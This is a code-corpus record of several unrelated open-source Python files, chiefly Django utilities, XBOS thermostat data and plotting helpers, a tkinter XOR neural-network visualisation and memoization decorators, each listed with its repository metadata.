|
nuremberg/core/management/commands/audit_joins.py
|
emmalemma/nuremberg
|
10a5f789f5668aa4e7902e1765737c2c764ff2b2
|
[
"MIT"
] | 6
|
2016-05-24T06:06:53.000Z
|
2021-03-12T19:40:42.000Z
|
from django.core.management.base import BaseCommand
from nuremberg.transcripts.models import Transcript
from nuremberg.transcripts.xml import TranscriptPageJoiner
class Command(BaseCommand):
help = 'Joins transcript pages and outputs a log of all joins made.'
def add_arguments(self, parser):
parser.add_argument('transcript', type=int, help='transcript to audit')
parser.add_argument('from_seq', type=int, help='seq range start')
parser.add_argument('to_seq', type=int, help='seq range end')
parser.add_argument('-a', action='store_true', default=False, help='Log allowed paragraph breaks as well as joins.')
def handle(self, *args, **options):
transcript = Transcript.objects.get(id=options['transcript'])
pages = transcript.pages.filter(seq_number__gte=options['from_seq'], seq_number__lte=options['to_seq'])
joiner = TranscriptPageJoiner(pages)
joiner.audit = True
print('Joining {} pages...'.format(pages.count()))
joiner.build_html()
print('Join ignored:')
for row in joiner.joins:
if row.startswith('IGNORED'):
print(row)
print('Join inserted:')
for row in joiner.joins:
if row.startswith('INSERTED'):
print(row)
print('Join rejected:')
for row in joiner.joins:
if row.startswith('REJECTED'):
print(row)
print('Join caught:')
for row in joiner.joins:
if row.startswith('CAUGHT'):
print(row)
if options['a']:
print('Join allowed:')
for row in joiner.joins:
if row.startswith('ALLOWED'):
print(row)
| 35.714286
| 124
| 0.614286
|
a40bf93a7c008dd732e748cb033ed1a039197bc9
| 2,045
|
py
|
Python
|
shop/migrations/0001_initial.py
|
Slohn/myshop
|
4e5034dc3b1561773060319f16628d44910c4a20
|
[
"MIT"
] | 20
|
2021-05-07T19:32:56.000Z
|
2022-02-06T12:12:56.000Z
|
shop/migrations/0001_initial.py
|
Slohn/myshop
|
4e5034dc3b1561773060319f16628d44910c4a20
|
[
"MIT"
] | 9
|
2021-04-08T18:29:18.000Z
|
2022-03-11T23:28:23.000Z
|
shop/migrations/0001_initial.py
|
Slohn/myshop
|
4e5034dc3b1561773060319f16628d44910c4a20
|
[
"MIT"
] | 10
|
2021-02-22T13:50:24.000Z
|
2022-03-15T11:51:27.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2019-11-27 07:15
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Category',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=200)),
('slug', models.SlugField(max_length=200, unique=True)),
],
options={
'ordering': ('name',),
'verbose_name': 'category',
'verbose_name_plural': 'categories',
},
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(db_index=True, max_length=200)),
('slug', models.SlugField(max_length=200)),
('image', models.ImageField(blank=True, upload_to='products/%Y/%m/%d')),
('description', models.TextField(blank=True)),
('price', models.DecimalField(decimal_places=2, max_digits=10)),
('stock', models.PositiveIntegerField()),
('available', models.BooleanField(default=True)),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('category', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='products', to='shop.Category')),
],
options={
'ordering': ('-created',),
},
),
migrations.AlterIndexTogether(
name='product',
index_together=set([('id', 'slug')]),
),
]
| 37.87037
| 138
| 0.554034
|
7c81cf8310b0c97adc1faf4c7cbd79981254d120
| 24,505
|
py
|
Python
|
DP/Server/utils.py
|
apanagopoulos/XBOS-DR
|
80e186d691bf17c244b1e87ccb5c2356155748e5
|
[
"Apache-2.0"
] | null | null | null |
DP/Server/utils.py
|
apanagopoulos/XBOS-DR
|
80e186d691bf17c244b1e87ccb5c2356155748e5
|
[
"Apache-2.0"
] | 25
|
2018-05-11T19:15:16.000Z
|
2018-08-09T03:11:28.000Z
|
DP/Server/utils.py
|
apanagopoulos/XBOS-DR
|
80e186d691bf17c244b1e87ccb5c2356155748e5
|
[
"Apache-2.0"
] | 3
|
2017-10-23T18:47:15.000Z
|
2018-08-20T16:41:18.000Z
|
# this is the plotter for the MPC graph
import datetime
import os
import string
import numpy as np
import pandas as pd
import plotly.graph_objs as go
import pytz
import yaml
from xbos import get_client
from xbos.devices.thermostat import Thermostat
# be careful of circular import.
# https://stackoverflow.com/questions/11698530/two-python-modules-require-each-others-contents-can-that-work
import ThermalDataManager
try:
import pygraphviz
from networkx.drawing.nx_agraph import graphviz_layout
# print("using package pygraphviz")
except ImportError:
try:
import pydotplus
from networkx.drawing.nx_pydot import graphviz_layout
# print("using package pydotplus")
except ImportError:
print()
print("Both pygraphviz and pydotplus were not found ")
print("see http://networkx.github.io/documentation"
"/latest/reference/drawing.html for info")
print()
raise
'''
Utility constants
'''
NO_ACTION = 0
HEATING_ACTION = 1
COOLING_ACTION = 2
FAN = 3
TWO_STAGE_HEATING_ACTION = 4
TWO_STAGE_COOLING_ACTION = 5
SERVER_DIR_PATH = UTILS_FILE_PATH = os.path.dirname(__file__) # this is true for now
'''
Utility functions
'''
# ============ BUILDING AND ZONE GETTER ========
def choose_building_and_zone():
print "-----------------------------------"
print "Buildings:"
print "-----------------------------------"
root, dirs, files = os.walk(SERVER_DIR_PATH + "/Buildings/").next()
for index, building in enumerate(dirs, start=1):
print index, building
print "-----------------------------------"
index = input("Please choose a building (give a number):") - 1
building = dirs[index]
print "-----------------------------------"
print ""
print "-----------------------------------"
print " " + str(building)
print "-----------------------------------"
print "-----------------------------------"
print "Zones:"
print "-----------------------------------"
root, dirs, files = os.walk("../Buildings/" + str(building) + "/ZoneConfigs").next()
for index, zones in enumerate(files, start=1):
print index, zones[:-4]
print "-----------------------------------"
index = input("Please choose a zone (give a number):") - 1
zone = files[index][:-4]
print "-----------------------------------"
print "-----------------------------------"
print " " + str(building)
print " " + str(zone)
print "-----------------------------------"
return building, zone
# ============ DATE FUNCTIONS ============
def get_utc_now():
"""Gets current time in utc time.
:return Datetime in utctime zone"""
return datetime.datetime.utcnow().replace(tzinfo=pytz.timezone("UTC"))
def in_between(now, start, end):
"""Finds whether now is between start and end. Takes care of cases such as start=11:00pm and end=1:00am
now = 00:01, and hence would return True.
:param now: (datetime.time)
:param start: (datetime.time)
:param end: (datetime.time)
:return (boolean)"""
if start < end:
return start <= now < end
# when end is in the next day.
elif end < start:
return start <= now or now < end
else:
return True
def combine_date_time(time, date):
"""Combines the time and date to a combined datetime.
:param time: (str) HH:MM
:param date: (datetime)
:returns datetime with date from date and time from time. But with seconds as 0."""
datetime_time = get_time_datetime(time)
return date.replace(hour=datetime_time.hour, minute=datetime_time.minute, second=0)
def in_between_datetime(now, start, end):
"""Finds whether now is between start and end.
:param now: (datetime)
:param start: (datetime)
:param end: (datetime)
:return (boolean)"""
return start <= now <= end
def get_time_datetime(time_string):
"""Gets datetime from string with format HH:MM.
:param date_string: string of format HH:MM
:returns datetime.time() object with no associated timzone. """
return datetime.datetime.strptime(time_string, "%H:%M").time()
def get_mdal_string_to_datetime(date_string, with_utc=True):
"""Gets datetime from string with format Year-Month-Day Hour:Minute:Second UTC. Note, string should be for utc
time.
:param date_string: string of format Year-Month-Day Hour:Minute:Second UTC.
:param with_utc: boolean indicating wether to localize to UTC time.
:returns datetime.time() object in UTC time or naive time. """
date_datetime = datetime.datetime.strptime(date_string, "%Y-%m-%d %H:%M:%S %Z")
if with_utc:
return date_datetime.replace(tzinfo=pytz.timezone("UTC"))
else:
return date_datetime
def get_mdal_datetime_to_string(date_object):
"""Gets string from datetime object. In UTC Time.
:param date_object
:returns '%Y-%m-%d %H:%M:%S UTC' """
return date_object.strftime('%Y-%m-%d %H:%M:%S') + ' UTC'
# ============ DATA FUNCTIONS ============
def round_increment(data, precision=0.05):
"""Round to nearest increment of precision.
:param data: np.array of floats or single float
:param precision: (float) the increment to round to
:return (np.array or float) of rounded floats."""
# source for rounding: https://stackoverflow.com/questions/2272149/round-to-5-or-other-number-in-python
return precision * np.round(data / float(precision))
def is_cooling(action_data):
"""Returns boolen area of actions which were cooling (either two or single stage).
:param action_data: np.array or pd.series"""
return (action_data == COOLING_ACTION) | (action_data == TWO_STAGE_COOLING_ACTION)
def is_heating(action_data):
"""Returns boolen area of actions which were heating (either two or single stage).
:param action_data: np.array or pd.series"""
return (action_data == HEATING_ACTION) | (action_data == TWO_STAGE_HEATING_ACTION)
def choose_client(cfg=None):
if cfg is not None and cfg["Server"]:
client = get_client(agent=cfg["Agent_IP"], entity=cfg["Entity_File"])
else:
client = get_client()
return client
def get_config(building):
config_path = SERVER_DIR_PATH + "/Buildings/" + building + "/" + building + ".yml"
try:
with open(config_path, "r") as f:
cfg = yaml.load(f)
except:
print("ERROR: No config file for building %s with path %s" % (building, config_path))
return
return cfg
def get_zone_config(building, zone):
config_path = SERVER_DIR_PATH + "/Buildings/" + building + "/" + "ZoneConfigs/" + zone + ".yml"
try:
with open(config_path, "r") as f:
cfg = yaml.load(f)
except:
print("ERROR: No config file for building %s and zone % s with path %s" % (building, zone, config_path))
return
return cfg
def get_zone_log(building, zone):
log_path = SERVER_DIR_PATH + "/Buildings/" + building + "/" + "Logs/" + zone + ".log"
## fix for one lines
try:
f = open(log_path, "r")
log = f.read()
log = string.replace(log, "UTCTHERMOSTAT", "UTC\nTHERMOSTAT")
f.close()
f = open(log_path, 'w')
f.write(log)
f.close()
except:
print("ERROR: No config file for building %s and zone % s with path %s" % (building, zone, log_path))
return
## end of fix DELETE THIS WHEN ALL LOGS ARE FIXED!
try:
with open(log_path, "r") as f:
### fix for same line logs ###
log = f.readlines()
except:
print("ERROR: No config file for building %s and zone % s with path %s" % (building, zone, log_path))
return
return log
# Maybe put in ThermalDataManager because of circular import.
def get_data(building=None, client=None, cfg=None, start=None, end=None, days_back=50, evaluate_preprocess=False,
force_reload=False):
"""
Get preprocessed data.
:param building: (str) building name
:param cfg: (dictionary) config file for building. If none, the method will try to find it.
:param days_back: how many days back from current moment.
:param evaluate_preprocess: (Boolean) should controller data manager add more features to data.
:param force_reload: (boolean) If some data for this building is stored, the reload if not force reload. Otherwise,
load data as specified.
:param start: the start time for the data. If none is given, we will use days_back to go back from the
end datetime if given (end - days_back), or the current time.
:param end: the end time for the data. If given, we will use it as our end. If not given, we will use the current
time as the end.
:return: {zone: pd.df with columns according to evaluate_preprocess}
"""
assert cfg is not None or building is not None
if cfg is not None:
building = cfg["Building"]
else:
cfg = get_config(building)
print("----- Get data for Building: %s -----" % building)
if evaluate_preprocess:
path = SERVER_DIR_PATH + "/Thermal_Data/" + building + "_eval"
else:
path = SERVER_DIR_PATH + "/Thermal_Data/" + building
if end is None:
end = get_utc_now()
if start is None:
start = end - datetime.timedelta(days=days_back)
# TODO ugly try/except
try:
assert not force_reload
print(path)
with open(path, "r") as f:
import pickle
thermal_data = pickle.load(f)
except:
if client is None:
client = choose_client(cfg)
dataManager = ThermalDataManager.ThermalDataManager(cfg, client)
thermal_data = dataManager.thermal_data(start=start, end=end, evaluate_preprocess=evaluate_preprocess)
with open(path, "wb") as f:
import pickle
pickle.dump(thermal_data, f)
return thermal_data
def get_raw_data(building=None, client=None, cfg=None, start=None, end=None, days_back=50, force_reload=False):
assert cfg is not None or building is not None
if cfg is not None:
building = cfg["Building"]
else:
config_path = SERVER_DIR_PATH + "/Buildings/" + building + "/" + building + ".yml"
try:
with open(config_path, "r") as f:
cfg = yaml.load(f)
except:
print("ERROR: No config file for building %s with path %s" % (building, config_path))
return
print("----- Get data for Building: %s -----" % building)
path = SERVER_DIR_PATH + "/Thermal_Data/" + building
# TODO ugly try/except
if end is None:
end = get_utc_now()
if start is None:
start = end - datetime.timedelta(days=days_back)
# inside and outside data data
import pickle
try:
assert not force_reload
with open(path + "_inside", "r") as f:
inside_data = pickle.load(f)
with open(path + "_outside", "r") as f:
outside_data = pickle.load(f)
except:
if client is None:
client = get_client()
dataManager = ThermalDataManager.ThermalDataManager(cfg, client)
inside_data = dataManager._get_inside_data(start, end)
outside_data = dataManager._get_outside_data(start, end)
with open(path + "_inside", "wb") as f:
pickle.dump(inside_data, f)
with open(path + "_outside", "wb") as f:
pickle.dump(outside_data, f)
return inside_data, outside_data
def get_mdal_data(mdal_client, query):
"""Gets mdal data. Necessary method because if a too long time frame is queried, mdal does not return the data.
:param mdal_client: mdal object to query data.
:param query: mdal query
:return pd.df with composition as columns. Timeseries in UTC time."""
start = get_mdal_string_to_datetime(query["Time"]["T0"])
end = get_mdal_string_to_datetime(query["Time"]["T1"])
time_frame = end - start
# get windowsize
str_window = query["Time"]["WindowSize"]
assert str_window[-3:] == "min"
WINDOW_SIZE = datetime.timedelta(minutes=int(str_window[:-3]))
if time_frame < WINDOW_SIZE:
raise Exception("WindowSize is less than the time interval for which data is requested.")
# To get logarithmic runtime we take splits which are powers of two.
max_interval = datetime.timedelta(hours=12) # the maximum interval length in which to split the data.
max_num_splits = int(time_frame.total_seconds() // max_interval.total_seconds())
all_splits = [1]
for _ in range(2, max_num_splits):
power_split = all_splits[-1] * 2
if power_split > max_num_splits:
break
all_splits.append(power_split)
received_all_data = False
outside_data = []
# start loop to get data in time intervals of logarithmically decreasing size. This will hopefully find the
# spot at which mdal returns data.
for num_splits in all_splits:
outside_data = []
pre_look_ahead = time_frame / num_splits
# to round down to nearest window size multiple
num_window_in_pre_look = pre_look_ahead.total_seconds() // WINDOW_SIZE.total_seconds()
look_ahead = datetime.timedelta(seconds=WINDOW_SIZE.total_seconds() * num_window_in_pre_look)
print("Attempting to get data in %f day intervals." % (look_ahead.total_seconds() / (60 * 60 * 24)))
temp_start = start
temp_end = temp_start + look_ahead
while temp_end <= end:
query["Time"]["T0"] = get_mdal_datetime_to_string(temp_start)
query["Time"]["T1"] = get_mdal_datetime_to_string(temp_end)
mdal_outside_data = mdal_client.do_query(query, tz="UTC")
if mdal_outside_data == {}:
print("Attempt failed.")
received_all_data = False
break
else:
outside_data.append(mdal_outside_data["df"])
# advance temp_start and temp_end
temp_start = temp_end + WINDOW_SIZE
temp_end = temp_start + look_ahead
# to get rest of data if look_ahead is not exact mutliple of time_between
if temp_start < end < temp_end:
temp_end = end
# To know that we received all data.
if end < temp_start:
received_all_data = True
# stop if we got the data
if received_all_data:
print("Succeeded.")
break
if not received_all_data:
raise Exception("WARNING: Unable to get data form MDAL.")
return pd.concat(outside_data)
def concat_zone_data(thermal_data):
"""Concatinates all thermal data zone data into one big dataframe. Will sort by index. Get rid of all zone_temperature columns.
:param thermal_data: {zone: pd.df}
:return pd.df without zone_temperature columns"""
concat_data = pd.concat(thermal_data.values()).sort_index()
filter_columns = ["zone_temperature" not in col for col in concat_data.columns]
return concat_data[concat_data.columns[filter_columns]]
def as_pandas(result):
time = result[list(result.keys())[0]][:, 0]
df = pd.DataFrame(time, columns=['Time'])
df['Time'] = pd.to_datetime(df['Time'], unit='s')
for key in result:
df[key] = result[key][:, 1].tolist()
try:
df[key + " Var"] = result[key][:, 2].tolist()
except IndexError:
pass
df = df.set_index('Time')
return df
# ============ THERMOSTAT FUNCTIONS ============
def has_setpoint_changed(tstat, setpoint_data, zone, building):
"""
Checks if thermostats was manually changed and prints warning.
:param tstat: Tstat object we want to look at.
:param setpoint_data: dict which has keys {"heating_setpoint": bool, "cooling_setpoint": bool} and corresponds to
the setpoint written to the thermostat by MPC.
:param zone: Name of the zone to print correct messages.
:return: Bool. Whether tstat setpoints are equal to setpoints written to tstat.
"""
WARNING_MSG = "WARNING. %s has been manually changed in zone %s. Setpoint is at %s from expected %s. " \
"Setting override to False and intiatiating program stop."
flag_changed = False
if tstat.cooling_setpoint != setpoint_data["cooling_setpoint"]:
flag_changed = True
print(WARNING_MSG % ("cooling setpoint", zone, tstat.cooling_setpoint, setpoint_data["cooling_setpoint"]))
if tstat.heating_setpoint != setpoint_data["heating_setpoint"]:
flag_changed = True
print(WARNING_MSG % ("heating setpoint", zone, tstat.heating_setpoint, setpoint_data["heating_setpoint"]))
return flag_changed
def set_override_false(tstat):
tstat.write({"override": False})
def get_thermostats(client, hod, building):
"""Gets the thermostats for given building.
:param client: xbos client object
:param hod: hod client object
:param building: (string) building name
:return {zone: tstat object}"""
query = """SELECT ?uri ?zone FROM %s WHERE {
?tstat rdf:type/rdfs:subClassOf* brick:Thermostat .
?tstat bf:uri ?uri .
?tstat bf:controls/bf:feeds ?zone .
};"""
# Start of FIX for missing Brick query
query = """SELECT ?zone ?uri FROM %s WHERE {
?tstat rdf:type brick:Thermostat .
?tstat bf:controls ?RTU .
?RTU rdf:type brick:RTU .
?RTU bf:feeds ?zone.
?zone rdf:type brick:HVAC_Zone .
?tstat bf:uri ?uri.
};"""
# End of FIX - delete when Brick is fixed
building_query = query % building
tstat_query_data = hod.do_query(building_query)['Rows']
tstats = {tstat["?zone"]: Thermostat(client, tstat["?uri"]) for tstat in tstat_query_data}
return tstats
# ============ PLOTTING FUNCTIONS ============
def plotly_figure(G, path=None):
pos = graphviz_layout(G, prog='dot')
edge_trace = go.Scatter(
x=[],
y=[],
line=go.Line(width=0.5, color='#888'),
hoverinfo='none',
mode='lines')
my_annotations = []
for edge in G.edges():
x0, y0 = pos[edge[0]]
x1, y1 = pos[edge[1]]
edge_trace['x'] += [x0, x1, None]
edge_trace['y'] += [y0, y1, None]
my_annotations.append(
dict(
x=(x0 + x1) / 2,
y=(y0 + y1) / 2,
xref='x',
yref='y',
text="" + G.get_edge_data(edge[0], edge[1])['action'] +
G.get_edge_data(edge[0], edge[1])['model_type'][0][0],
# TODO for multigraph use [0] to get the frist edge. Also, only using the first letter to identify the model.
showarrow=False,
arrowhead=2,
ax=0,
ay=0
)
)
node_trace = go.Scatter(
x=[],
y=[],
text=[],
mode='markers',
hoverinfo='text',
marker=go.Marker(
showscale=False,
# colorscale options
# 'Greys' | 'Greens' | 'Bluered' | 'Hot' | 'Picnic' | 'Portland' |
# Jet' | 'RdBu' | 'Blackbody' | 'Earth' | 'Electric' | 'YIOrRd' | 'YIGnBu'
colorscale='YIGnBu',
reversescale=True,
color=[],
size=10,
colorbar=dict(
thickness=15,
title='Node Connections',
xanchor='left',
titleside='right'
),
line=dict(width=2)))
for node in G.nodes():
x, y = pos[node]
node_trace['x'].append(x)
node_trace['y'].append(y)
node_info = "Time: +{0}<br>Temps: {1}<br>Usage Cost: {2}".format(node.time,
node.temps,
G.node[node]['usage_cost'])
node_trace['text'].append(node_info)
if path is None:
node_trace['marker']['color'].append(G.node[node]['usage_cost'])
elif node in path:
node_trace['marker']['color'].append('rgba(255, 0, 0, 1)')
else:
node_trace['marker']['color'].append('rgba(0, 0, 255, 1)')
fig = go.Figure(data=go.Data([edge_trace, node_trace]),
layout=go.Layout(
title='<br>Network graph made with Python',
titlefont=dict(size=16),
showlegend=False,
width=650,
height=650,
hovermode='closest',
margin=dict(b=20, l=5, r=5, t=40),
annotations=my_annotations,
xaxis=go.XAxis(showgrid=False, zeroline=False, showticklabels=False),
yaxis=go.YAxis(showgrid=False, zeroline=False, showticklabels=False)))
return fig
# ========= Multithreading ========
class Barrier:
"""Class which behaves like python3's Barrier class.
NOTE: Never change any of the internal logic or set variables after they were set in the init."""
def __init__(self, num_threads):
import threading
self.num_threads = num_threads
self.count = 0
self.mutex = threading.Semaphore(1)
self.barrier = threading.Semaphore(0)
self.is_set = True
def wait(self):
"""Behaves like wait function from Barrier class. Make all threads wait together and then release them."""
self.mutex.acquire()
if not self.is_set:
self.reset()
self.mutex.release()
# increment counter by one to indicate that another thread is waiting now.
self.mutex.acquire()
self.count = self.count + 1
self.mutex.release()
# check if enough threads are waiting. If enough are waiting, the barrier will be opened
if self.count == self.num_threads:
self.barrier.release()
# if not enough threads are waiting, make the thread wait for the barrier to be released in the if statement.
self.barrier.acquire()
# release the barrier so other threads can use it
self.barrier.release()
# we set the flag to false. However, this should be fine since every thread should already be past
# the if statement that checks whether the Barrier is_set.
self.mutex.acquire()
if self.is_set:
self.is_set = False
self.mutex.release()
def reset(self):
"""Resets the barrier class."""
self.count = 0
self.barrier.acquire()
self.is_set = True
if __name__ == "__main__":
# bldg = "csu-dominguez-hills"
# inside, outside = get_raw_data(building=bldg, days_back=20, force_reload=True)
# use_data = {}
# for zone, zone_data in inside.items():
# if zone != "HVAC_Zone_Please_Delete_Me":
# use_data[zone] = zone_data
# print(zone)
# print(zone_data[zone_data["action"] == 2].shape)
# print(zone_data[zone_data["action"] == 5].shape)
#
# t_man = ThermalDataManager.ThermalDataManager({"Building": bldg}, client=get_client())
# outside = t_man._preprocess_outside_data(outside.values())
# print("inside")
# th_data = t_man._preprocess_thermal_data(use_data, outside, True)
#
# import pickle
# with open("u_p", "r") as f:
# th = pickle.load(f)
#
# zone = "HVAC_Zone_SAC_2101"
# zone_data = th[zone]
# print(zone_data[zone_data["action"] == 5].shape)
# print(zone_data[zone_data["action"] == 2].shape)
test_barrier = True
if test_barrier:
barrier = Barrier(2)
import time
import threading
def func1():
time.sleep(3)
#
barrier.wait()
#
print('Working from func1')
return
def func2():
time.sleep(5)
#
barrier.wait()
#
print('Working from func2')
return
threading.Thread(target=func1).start()
threading.Thread(target=func2).start()
time.sleep(6)
# check if reset
threading.Thread(target=func1).start()
threading.Thread(target=func2).start()
| 35.057225
| 131
| 0.599674
|
6e5cf966d85759af33becbcccfecc7f0866697b8
| 2,297
|
py
|
Python
|
Implementation_NN/3_nn_XOR_gate_visualization.py
|
bikashsingh0/neural_network_scratch
|
c5db50e75dc0216f9b5bed0f2e48f51e2e370bde
|
[
"MIT"
] | 1
|
2019-07-04T05:54:00.000Z
|
2019-07-04T05:54:00.000Z
|
Implementation_NN/3_nn_XOR_gate_visualization.py
|
bikashsingh0/neural_network_scratch
|
c5db50e75dc0216f9b5bed0f2e48f51e2e370bde
|
[
"MIT"
] | null | null | null |
Implementation_NN/3_nn_XOR_gate_visualization.py
|
bikashsingh0/neural_network_scratch
|
c5db50e75dc0216f9b5bed0f2e48f51e2e370bde
|
[
"MIT"
] | null | null | null |
#!/bin/python3
import sys
import random
import numpy as np
sys.path.append('..')
from neural_network import NeuralNetwork
import time
from tkinter import *
tk = Tk()
widthSize = 500
heightSize = 500
frameRate = 60
frameSpeed = int(1 / frameRate * 1000)
canvas = Canvas(tk, width=widthSize, height=heightSize, background="black")
tk.title("Drawing_float")
canvas.pack()
inputLen = 2
hiddenLen = 3
outputLen = 1
learningRate = 0.1
n = NeuralNetwork(inputLen, hiddenLen, outputLen)
# with this structure, answer may not be predicted sometimes
# n = NeuralNetwork(2, 2, 1)
training_data = {
1: {'inputs': np.array([[0],[0]]), 'targets': np.array([[0]])},
2: {'inputs': np.array([[0],[1]]), 'targets': np.array([[1]])},
3: {'inputs': np.array([[1],[0]]), 'targets': np.array([[1]])},
4: {'inputs': np.array([[1],[1]]), 'targets': np.array([[0]])},
}
def training():
x = random.choice(list(training_data.values()))
inputs = x.get('inputs')
targets = x.get('targets')
n.trainSVLearing(inputs,targets,learningRate)
while True:
for i in range(2000):
training()
resolution = 10
cols = widthSize/resolution
rows = heightSize/resolution
for i in range(int(cols)):
for j in range(int(rows)):
x1 = i/cols
x2 = j/rows
inputs = np.array([[x1],[x2]])
print ("Inputs = "+ str(inputs))
y = n.feedForward(inputs)
print ("Output = "+ str(y))
output = y
# print("Value of y is = " + str(output))
color = int(output * 255)
# print("Value of color is = " + str(color))
hexColor = format(color, '02x')
# print("Value of hex is = " + str(hexColor))
finalColor = "#" + hexColor + hexColor + hexColor
print("finalColor = " + str(finalColor))
# rect = canvas.create_rectangle(i*resolution, j*resolution, (i+1)*resolution, (j+1)*resolution, outline='red')
rect = canvas.create_rectangle(i*resolution, j*resolution, (i+1)*resolution, (j+1)*resolution)
# canvas.itemconfig(rect, fill="#ff00ff")
canvas.itemconfig(rect, fill=finalColor)
tk.after(frameSpeed, tk.update()) # for every give time updates frame
tk.mainloop()
| 29.831169
| 123
| 0.594689
|
24d99a7ff3efffe5d3e4927117078f1d35e3d087
| 24
|
py
|
Python
|
splunk_sdk/__version__.py
|
ahallur/splunk-cloud-sdk-python
|
27914e4cb624bcc67788408688553cfb99f64aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
splunk_sdk/__version__.py
|
ahallur/splunk-cloud-sdk-python
|
27914e4cb624bcc67788408688553cfb99f64aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
splunk_sdk/__version__.py
|
ahallur/splunk-cloud-sdk-python
|
27914e4cb624bcc67788408688553cfb99f64aa1
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
__version__ = '1.0.0b4'
| 12
| 23
| 0.666667
|
1df50163d986d9a7745847149100d8e31050f894
| 265
|
py
|
Python
|
chandler/run.py
|
jenlaiwong/ColorNets
|
6b976f0b3e09ab7478691d9cc8d37b35d2885175
|
[
"MIT"
] | null | null | null |
chandler/run.py
|
jenlaiwong/ColorNets
|
6b976f0b3e09ab7478691d9cc8d37b35d2885175
|
[
"MIT"
] | null | null | null |
chandler/run.py
|
jenlaiwong/ColorNets
|
6b976f0b3e09ab7478691d9cc8d37b35d2885175
|
[
"MIT"
] | null | null | null |
import pickle
import numpy as np
#### Setup
# read W1 W2 history if it exists, otherwise pick random and write
# read x and y from inputs and write them to files
weight_history (append only)
(read only)
[Xy1, Xy2, ..]
# thread concurrent
run multi processes
| 14.722222
| 66
| 0.728302
|
8d022e2ab3b59eb45a360c5573f74da1e0051beb
| 3,962
|
py
|
Python
|
ion/cache.py
|
bamaxw/ion
|
a04b7d6b05cc606e821d52bbdbb7fe080742134f
|
[
"MIT"
] | 1
|
2019-04-29T15:13:33.000Z
|
2019-04-29T15:13:33.000Z
|
ion/cache.py
|
bamaxw/ion
|
a04b7d6b05cc606e821d52bbdbb7fe080742134f
|
[
"MIT"
] | null | null | null |
ion/cache.py
|
bamaxw/ion
|
a04b7d6b05cc606e821d52bbdbb7fe080742134f
|
[
"MIT"
] | null | null | null |
'''Functions and classes helping with application-level caching and memoization'''
from typing import Callable, Any, Optional
from functools import wraps, partial
from collections import namedtuple
import time
TsValue = namedtuple('TsValue', ['value', 'timestamp'])
class MemoizeWithTimeout:
'''
Use this class to memoize a functions result for a certain period of time
Class attributes:
- _per_func_cache: stores a function result in a dictionary where
key is tuple(args, tuple(sorted(kwargs.items()))) tuple, and
value is TsValue with value being return value and ts being timestamp when it happened
- _timeouts: stores timeout value for each of registered functions
'''
_per_func_cache = {}
_timeouts = {}
def __init__(self, timeout: int = 60):
self.timeout = float(timeout)
def collect(self) -> None:
"""Clear cache of results which have timed out"""
for func, func_cache in self._per_func_cache.items():
cache = {}
for args_kwargs, cached in func_cache.items():
if (time.time() - cached.timestamp) < self._timeouts[func]:
cache[args_kwargs] = cached
self._per_func_cache[func] = cache
def __call__(self, func):
cache = self._per_func_cache[func] = {}
self._timeouts[func] = self.timeout
@wraps(func)
def _wrapper(*args, **kwargs):
args_kwargs = (args, tuple(sorted(kwargs.items())))
try:
cached = cache[args_kwargs]
if (time.time() - cached.timestamp) > self.timeout:
raise KeyError
except KeyError:
return_value = func(*args, **kwargs)
cached = cache[args_kwargs] = TsValue(
value=return_value,
timestamp=time.time()
)
return cached.value
return _wrapper
def create_minute_memoize(no_minutes: float):
'''Creates MemoizeWithTimeout with timeout equal no_minutes minutes'''
return MemoizeWithTimeout(no_minutes * 60)
minute_memoize = MemoizeWithTimeout(60)
cache_for = create_minute_memoize
memoize_for = create_minute_memoize
_remember_cache = {}
def remember(func):
@wraps(func)
def _wrap(*a, **kw):
if str(type(func)) in ("<class 'function'>", "<class 'builtin_function_or_method'>"):
obj = None
elif str(type(func)) == "<class 'method'>":
obj = a[0]
if obj not in _remember_cache:
_remember_cache[obj] = {}
if func not in _remember_cache[obj]:
_remember_cache[obj][func] = func(*a, **kw)
return _remember_cache[obj][func]
return _wrap
def _from_cache_on_err(func: Callable, *, default: Any):
'''
Caches a function response, so that if the function is called
in the future and results in an error, the cached response is returned
If the first function call results in an error, the error is re-raised
Assumed use-case is reading remote data, so that if the remote server goes down
the previously read version of the data will be returned as a fallback
'''
_cached = default
@wraps(func)
def _wrap(*a, **kw):
try:
return func(*a, **kw)
except: # pylint: disable=bare-except
if _cached is default:
raise
return _cached
return _wrap
def from_cache_on_err(
func: Optional[Callable] = None,
default: Any = ...
):
'''
Wrapper around _from_cache_on_err allows for the from_cache_on_err to be called
with additional argument *default* that initializes cache with data that is impossible
to be returned from the function itself
'''
if func:
return _from_cache_on_err(func, default=default)
return partial(_from_cache_on_err, default=default)
| 36.018182
| 116
| 0.626704
|
0052373d155a064be733051034f056b081f27b0b
| 9,550
|
py
|
Python
|
cinder/tests/unit/api/v2/fakes.py
|
mail2nsrajesh/cinder
|
a688b872bec6d1abd4dcd852bdb8e8a921369d2e
|
[
"Apache-2.0"
] | null | null | null |
cinder/tests/unit/api/v2/fakes.py
|
mail2nsrajesh/cinder
|
a688b872bec6d1abd4dcd852bdb8e8a921369d2e
|
[
"Apache-2.0"
] | 2
|
2018-10-25T13:04:01.000Z
|
2019-08-17T13:15:24.000Z
|
cinder/tests/unit/api/v2/fakes.py
|
mail2nsrajesh/cinder
|
a688b872bec6d1abd4dcd852bdb8e8a921369d2e
|
[
"Apache-2.0"
] | 2
|
2018-10-17T13:32:50.000Z
|
2018-11-08T08:39:39.000Z
|
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
